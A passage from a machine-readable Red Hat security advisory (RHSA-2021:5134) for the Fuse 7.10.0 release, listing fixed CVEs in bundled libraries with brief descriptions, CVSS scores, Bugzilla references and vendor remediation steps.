"text": "This release of Red Hat Fuse 7.10.0 serves as a replacement for Red Hat Fuse 7.9, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core (CVE-2020-9488, CVE-2021-44228)\n\n* nodejs-lodash (CVE-2019-10744)\n\n* libthrift (CVE-2020-13949)\n\n* xstream (CVE-2020-26217, CVE-2020-26259, CVE-2021-21341, CVE-2021-21342, CVE-2021-21343, CVE-2021-21344, CVE-2021-21345, CVE-2021-21346, CVE-2021-21347, CVE-2021-21348, CVE-2021-21349, CVE-2021-21350, CVE-2021-21351)\n\n* undertow (CVE-2020-27782, CVE-2021-3597, CVE-2021-3629, CVE-2021-3690)\n\n* xmlbeans (CVE-2021-23926)\n\n* batik (CVE-2020-11987)\n\n* xmlgraphics-commons (CVE-2020-11988)\n\n* tomcat (CVE-2020-13943)\n\n* bouncycastle (CVE-2020-15522, CVE-2020-15522)\n\n* groovy (CVE-2020-17521)\n\n* tomcat (CVE-2020-17527)\n\n* jetty (CVE-2020-27218, CVE-2020-27223, CVE-2021-28163, CVE-2021-28164, CVE-2021-28169, CVE-2021-34428)\n\n* jackson-dataformat-cbor (CVE-2020-28491)\n\n* jboss-remoting (CVE-2020-35510)\n\n* kubernetes-client (CVE-2021-20218)\n\n* netty (CVE-2021-21290, CVE-2021-21295, CVE-2021-21409)\n\n* spring-web (CVE-2021-22118)\n\n* cxf-core (CVE-2021-22696)\n\n* json-smart (CVE-2021-27568)\n\n* jakarta.el (CVE-2021-28170)\n\n* commons-io (CVE-2021-29425)\n\n* sshd-core (CVE-2021-30129)\n\n* cxf-rt-rs-json-basic (CVE-2021-30468)\n\n* netty-codec (CVE-2021-37136, CVE-2021-37137)\n\n* jsoup (CVE-2021-37714)\n\n* poi (CVE-2019-12415)\n\n* mysql-connector-java (CVE-2020-2875, CVE-2020-2934)\n\n* wildfly (CVE-2021-3536)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5134",
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.fuse\u0026version=7.10.0",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.fuse\u0026version=7.10.0"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "1739497",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1739497"
},
{
"category": "external",
"summary": "1802531",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802531"
},
{
"category": "external",
"summary": "1831139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831139"
},
{
"category": "external",
"summary": "1851014",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851014"
},
{
"category": "external",
"summary": "1851019",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851019"
},
{
"category": "external",
"summary": "1887648",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887648"
},
{
"category": "external",
"summary": "1898907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898907"
},
{
"category": "external",
"summary": "1901304",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1901304"
},
{
"category": "external",
"summary": "1902826",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1902826"
},
{
"category": "external",
"summary": "1904221",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1904221"
},
{
"category": "external",
"summary": "1905796",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905796"
},
{
"category": "external",
"summary": "1908837",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908837"
},
{
"category": "external",
"summary": "1922102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922102"
},
{
"category": "external",
"summary": "1922123",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922123"
},
{
"category": "external",
"summary": "1923405",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"category": "external",
"summary": "1927028",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1927028"
},
{
"category": "external",
"summary": "1928172",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928172"
},
{
"category": "external",
"summary": "1930423",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423"
},
{
"category": "external",
"summary": "1933808",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933808"
},
{
"category": "external",
"summary": "1933816",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933816"
},
{
"category": "external",
"summary": "1934116",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934116"
},
{
"category": "external",
"summary": "1937364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937364"
},
{
"category": "external",
"summary": "1939839",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1939839"
},
{
"category": "external",
"summary": "1942539",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942539"
},
{
"category": "external",
"summary": "1942545",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942545"
},
{
"category": "external",
"summary": "1942550",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942550"
},
{
"category": "external",
"summary": "1942554",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942554"
},
{
"category": "external",
"summary": "1942558",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942558"
},
{
"category": "external",
"summary": "1942578",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942578"
},
{
"category": "external",
"summary": "1942629",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942629"
},
{
"category": "external",
"summary": "1942633",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942633"
},
{
"category": "external",
"summary": "1942635",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942635"
},
{
"category": "external",
"summary": "1942637",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942637"
},
{
"category": "external",
"summary": "1942642",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1942642"
},
{
"category": "external",
"summary": "1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "1945710",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945710"
},
{
"category": "external",
"summary": "1945712",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945712"
},
{
"category": "external",
"summary": "1946341",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946341"
},
{
"category": "external",
"summary": "1948001",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948001"
},
{
"category": "external",
"summary": "1948752",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948752"
},
{
"category": "external",
"summary": "1962879",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962879"
},
{
"category": "external",
"summary": "1965497",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1965497"
},
{
"category": "external",
"summary": "1970930",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970930"
},
{
"category": "external",
"summary": "1971016",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1971016"
},
{
"category": "external",
"summary": "1973392",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973392"
},
{
"category": "external",
"summary": "1974854",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974854"
},
{
"category": "external",
"summary": "1974891",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1974891"
},
{
"category": "external",
"summary": "1977362",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1977362"
},
{
"category": "external",
"summary": "1981527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1981527"
},
{
"category": "external",
"summary": "1991299",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1991299"
},
{
"category": "external",
"summary": "1995259",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1995259"
},
{
"category": "external",
"summary": "2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5134.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Fuse 7.10.0 release and security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:21+00:00",
"generator": {
"date": "2024-12-12T01:18:21+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5134",
"initial_release_date": "2021-12-14T21:31:33+00:00",
"revision_history": [
{
"date": "2021-12-14T21:31:33+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T21:31:33+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:21+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Fuse 7.10",
"product": {
"name": "Red Hat Fuse 7.10",
"product_id": "Red Hat Fuse 7.10",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_fuse:7"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Fuse"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-10744",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2019-07-26T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1739497"
}
],
"notes": [
{
"category": "description",
"text": "A Prototype Pollution vulnerability was found in lodash. Calling certain methods with untrusted JSON could lead to modifying objects up the prototype chain, including the global Object. A crafted JSON object passed to a vulnerable method could lead to denial of service or data injection, with various consequences.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The lodash dependency is included in OpenShift Container Platform (OCP) by Kibana in the aggregated logging stack. Elastic have issued a security advisory (ESA-2019-10) for Kibana for this vulnerability, and in that advisory stated that no exploit vectors had been identified in Kibana. Therefore we rate this issue as moderate for OCP and may fix this issue in a future release.\n\nhttps://www.elastic.co/community/security\n\nThis issue did not affect the versions of rh-nodejs8-nodejs and rh-nodejs10-nodejs as shipped with Red Hat Software Collections.\n\nWhilst a vulnerable version of lodash has been included in ServiceMesh, the impact is lowered to Moderate due to the library not being directly accessible increasing the attack complexity and the fact that the attacker would need some existing access - meaning the vulnerability is not crossing a privilege boundary.\n\nRed Hat Quay imports lodash as a runtime dependency of restangular. The restangular function in use by Red Hat Quay do not use lodash to parse user input. This issue therefore rated moderate impact for Red Hat Quay.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-10744"
},
{
"category": "external",
"summary": "RHBZ#1739497",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1739497"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-10744",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10744"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10744"
}
],
"release_date": "2019-08-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.0"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties"
},
{
"cve": "CVE-2019-12415",
"cwe": {
"id": "CWE-611",
"name": "Improper Restriction of XML External Entity Reference"
},
"discovery_date": "2020-02-13T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1802531"
}
],
"notes": [
{
"category": "description",
"text": "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "poi: a specially crafted Microsoft Excel document allows attacker to read files from the local filesystem",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-12415"
},
{
"category": "external",
"summary": "RHBZ#1802531",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1802531"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-12415",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12415"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-12415",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12415"
}
],
"release_date": "2020-02-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "The vulnerability is in the XSSFExportToXml util; avoid usage of this tool to mitigate the vulnerability.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "poi: a specially crafted Microsoft Excel document allows attacker to read files from the local filesystem"
},
{
"cve": "CVE-2020-2875",
"discovery_date": "2020-06-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1851019"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the mysql-connector-java package. A complicated attack against the mysql Connector/J allows attackers on the local network to interfere with a user\u0027s connection and insert unauthorized SQL commands in MySQL Connectors and other products.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux customers are advised to replace the mysql-connector-java package with the mariadb-java-client, available in Red Hat Software Collections. It can be installed this way:\n\n # yum-config-manager --enable rhel-server-rhscl-7-rpms\n\n # yum install rh-mariadb103-mariadb-java-client",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-2875"
},
{
"category": "external",
"summary": "RHBZ#1851019",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851019"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-2875",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2875"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-2875",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2875"
}
],
"release_date": "2020-04-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete"
},
{
"cve": "CVE-2020-2934",
"discovery_date": "2020-06-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1851014"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the mysql-connector-java package. A complicated attack against the mysql Connector/J allows attackers on the local network to interfere with a user\u0027s connection and insert unauthorized SQL commands.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux customers are advised to replace the mysql-connector-java package with the mariadb-java-client, available in Red Hat Software Collections. It can be installed this way:\n\n # yum-config-manager --enable rhel-server-rhscl-7-rpms\n\n # yum install rh-mariadb103-mariadb-java-client",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-2934"
},
{
"category": "external",
"summary": "RHBZ#1851014",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851014"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-2934",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2934"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-2934",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2934"
}
],
"release_date": "2020-04-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "mysql-connector-java: allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors which could result in unauthorized update, insert or delete"
},
{
"cve": "CVE-2020-9488",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2020-04-25T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1831139"
}
],
"notes": [
{
"category": "description",
"text": "Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j: improper validation of certificate with host mismatch in SMTP appender",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-9488"
},
{
"category": "external",
"summary": "RHBZ#1831139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1831139"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-9488",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9488"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-9488",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9488"
}
],
"release_date": "2020-04-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Previous versions can set the system property mail.smtp.ssl.checkserveridentity to true to globally enable hostname verification for SMTPS connections.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "log4j: improper validation of certificate with host mismatch in SMTP appender"
},
{
"cve": "CVE-2020-11987",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-02-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1933808"
}
],
"notes": [
{
"category": "description",
"text": "Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "batik: SSRF due to improper input validation by the NodePickerPanel",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-11987"
},
{
"category": "external",
"summary": "RHBZ#1933808",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933808"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-11987",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11987"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11987",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11987"
},
{
"category": "external",
"summary": "https://xmlgraphics.apache.org/security.html",
"url": "https://xmlgraphics.apache.org/security.html"
}
],
"release_date": "2021-02-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "batik: SSRF due to improper input validation by the NodePickerPanel"
},
{
"cve": "CVE-2020-11988",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2021-02-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1933816"
}
],
"notes": [
{
"category": "description",
"text": "Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xmlgraphics-commons: SSRF due to improper input validation by the XMPParser",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw does not affect xmlgraphics-commons as shipped with Red Hat Enterprise Linux 8. It is out of support scope for Red Hat Enterprise Linux 6 and 7. To learn more about support scope for Red Hat Enterprise Linux, please see https://access.redhat.com/support/policy/updates/errata/ .",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-11988"
},
{
"category": "external",
"summary": "RHBZ#1933816",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1933816"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-11988",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11988"
},
{
"category": "external",
